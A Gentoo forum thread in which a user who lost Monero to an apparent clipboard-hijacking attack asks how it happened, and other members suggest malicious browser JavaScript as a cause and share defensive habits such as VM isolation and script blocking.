I recently just lost crypto due to my clipboard somehow replacing the correct wallet address I was sending to with a very similar wallet address presumably controlled by a hacker. I was running a fully up to date gentoo box at the time of the attack, and a clamscan of my entire system resulted in 0 detected infected files. I am quite curious as to how this could have happened and would like to investigate further. Any advice on how to investigate deeper, or any theories on how this could have occurred would be greatly appreciated.
For more details, I was using the monero-gui wallet downloaded from getmonro.org. I initially sent a very small amount of monero to a wallet, and the funds were received with no issues. However about 10 minutes later I decided to send a larger amount of monero to the same wallet, but when copy and pasting the address this time somehow the address of the wallet got slightly altered, with the first 10 characters and last 8 characters being altered. The address also changed from a 106 character integrated address to a 95 character raw address. I obviously should have triple checked the address before sending, but was not expecting such an occurrence to happen.
clipboard hijacking resulting in stolen crypto
Message
- aDownwardSpiral
- n00b
- Posts: 1
- Joined: Wed Jul 17, 2024 2:54 pm
- kgdrenefort
- Guru
- Posts: 337
- Joined: Tue Sep 19, 2023 6:10 am
- Location: Somewhere in the 77
Hello,
ClamAV isn't for your own security on Linux, it match against Windows virus. Plus it's not, per-se, an anti-virus but an anti-virus toolkit.
The best fails are the kind of yours, human error, we all fail at some level one day and lost stuff (money, datas, access…). Sorry for you. Hope it wasn't that much tho.
I really don't know how you were infected, if that's the case, but consider these always-good-security-advice :
- Gentoo, Hardened, is a plus but won't have helped you I guess here
- Close useless services and ports such as SSH (22) if not needed
- Avoid experimental release of software, specially some as web browser
- Keep up-to-date about GLSA alert on Gentoo
- Avoid crypto on your main box, I guess, and use a virtual machine or another computer for such things. Like a Raspberry PI with a simple WM running your wallet… It's enough.
- Don't be paranoid and don't cipher everything, you'll lost so much time for 0 more security. It's useful if you get robbed. If I want that hard the content, I'll just cut each of your fingers until you gave me that password, anyway. Save me, save you, some time
!!!
Regards,
GASPARD DE RENEFORT Kévin
ClamAV isn't for your own security on Linux, it match against Windows virus. Plus it's not, per-se, an anti-virus but an anti-virus toolkit.
The best fails are the kind of yours, human error, we all fail at some level one day and lost stuff (money, datas, access…). Sorry for you. Hope it wasn't that much tho.
I really don't know how you were infected, if that's the case, but consider these always-good-security-advice :
- Gentoo, Hardened, is a plus but won't have helped you I guess here
- Close useless services and ports such as SSH (22) if not needed
- Avoid experimental release of software, specially some as web browser
- Keep up-to-date about GLSA alert on Gentoo
- Avoid crypto on your main box, I guess, and use a virtual machine or another computer for such things. Like a Raspberry PI with a simple WM running your wallet… It's enough.
- Don't be paranoid and don't cipher everything, you'll lost so much time for 0 more security. It's useful if you get robbed. If I want that hard the content, I'll just cut each of your fingers until you gave me that password, anyway. Save me, save you, some time
!!!Regards,
GASPARD DE RENEFORT Kévin
Browsers are infamous for their terrible security practices, particularly around JavaScript. My guess would be that the OP did something in some web page that the browser interpreted as permission to update the clipboard contents, and that update replaced the good address with the bad one.
I would also assert that this is a minor failing of the tool that was used to send the crypto-currency. In my opinion, it ought to have a mechanism to warn the user that the entered address is not one that was ever used before, and ask the user to confirm that this never-before-used address is the intended one. If it had such a mechanism, it would have triggered a warning here, since the first (good) send would not have caused the second (bad) one to be treated as trusted.
I would also assert that this is a minor failing of the tool that was used to send the crypto-currency. In my opinion, it ought to have a mechanism to warn the user that the entered address is not one that was ever used before, and ask the user to confirm that this never-before-used address is the intended one. If it had such a mechanism, it would have triggered a warning here, since the first (good) send would not have caused the second (bad) one to be treated as trusted.
I would concur with Hu's assessment here. Knowing the tabs you had open at the time would help. It's possible that perhaps one of the sites had been infected with some JS which inspected the clipboard for something which looks like a wallet address and substitutes it if it finds one.
EDIT: I should say that I also suspect it's unlikely it was outside of the browser given it could just pretend you sent it to the right address, even.
EDIT: I should say that I also suspect it's unlikely it was outside of the browser given it could just pretend you sent it to the right address, even.
- kgdrenefort
- Guru
- Posts: 337
- Joined: Tue Sep 19, 2023 6:10 am
- Location: Somewhere in the 77
I may be a little extreme in the way I look at this, but IMO things have gotten to the point that with the advent of HTML5, I just don't trust browsers anymore. I think were at the point where spyware is built into every browser, and every web site that you visit is built using tools to share your data with anonymous third parties without you knowing what's going on. I feel like I need to fully sandbox them to protect myself.
I'm not at the point that I feel like I have to boot up tails on bare metal every time that I want to go online, but I am at the point that I won't run a browser outside of a virtual machine where that vm gets used for the task at hand and nothing else. I don't trust google, so I have a separate vm for everything google-related (google, youtube, etc.) and it doesn't get used for anything else. I have another VM that I use for general web browsing, another one for web based email, and another one for banking only. They all use a different browser in a different VM, and a fresh-install VM image gets copied over to a new VM for every online session and destroyed afterwards. I try not to leave any bread crumbs behind. As far as the rest of the world is concerned, it looks like I'm visiting their site after performing a brand-new bare metal installation.
I know it's extreme, but how else can you really protect yourself when the browser/internet system is designed to work against you?
I'm not at the point that I feel like I have to boot up tails on bare metal every time that I want to go online, but I am at the point that I won't run a browser outside of a virtual machine where that vm gets used for the task at hand and nothing else. I don't trust google, so I have a separate vm for everything google-related (google, youtube, etc.) and it doesn't get used for anything else. I have another VM that I use for general web browsing, another one for web based email, and another one for banking only. They all use a different browser in a different VM, and a fresh-install VM image gets copied over to a new VM for every online session and destroyed afterwards. I try not to leave any bread crumbs behind. As far as the rest of the world is concerned, it looks like I'm visiting their site after performing a brand-new bare metal installation.
I know it's extreme, but how else can you really protect yourself when the browser/internet system is designed to work against you?
- yaslam
- Tux's lil' helper
- Posts: 103
- Joined: Wed May 08, 2024 10:06 pm
- Location: Scotland, UK
- Contact:
I am a lot less extreme than you. I use LibreWolf + NoScript + Ublock Origin to minimize tracking. LibreWolf is configured to clear cookies and site data every time it is closed and has various anti-fingerprinting options enabled (sure, I have to sign in each time I restart the browser, but he who sacrifices privacy for convenience deserves neither), NoScript is for preventing JavaScript and other things running on a web page, but per-domain, so I can allow JavaScript for domains that need it. Ublock Origin is an ad-blocker which helps more with the trackers.Bob P wrote:I know it's extreme, but how else can you really protect yourself when the browser/internet system is designed to work against you?
I have found that with NoScript enabled, some websites that otherwise would have tens or hundreds of ad domains and trackers showing up in Ublock Origin, would have none. This is because JS is being blocked and preventing garbage analytics companies from running their JS on my browser. It is great occasionally seeing a website that works only with CSS and HTML.
Last edited by yaslam on Sun Jun 08, 2025 1:53 pm, edited 1 time in total.
CPU: 6-core AMD Ryzen 5 5600 (-MT MCP-) speed/min/max: 3426/550/4468 MHz
Kernel: 6.12.31-gentoo-yaslam x86_64 Up: 7h 50m Mem: 4.05/31.27 GiB (13.0%)
Storage: 2.95 TiB (51.5% used) Procs: 394 Shell: fish inxi: 3.3.38
Kernel: 6.12.31-gentoo-yaslam x86_64 Up: 7h 50m Mem: 4.05/31.27 GiB (13.0%)
Storage: 2.95 TiB (51.5% used) Procs: 394 Shell: fish inxi: 3.3.38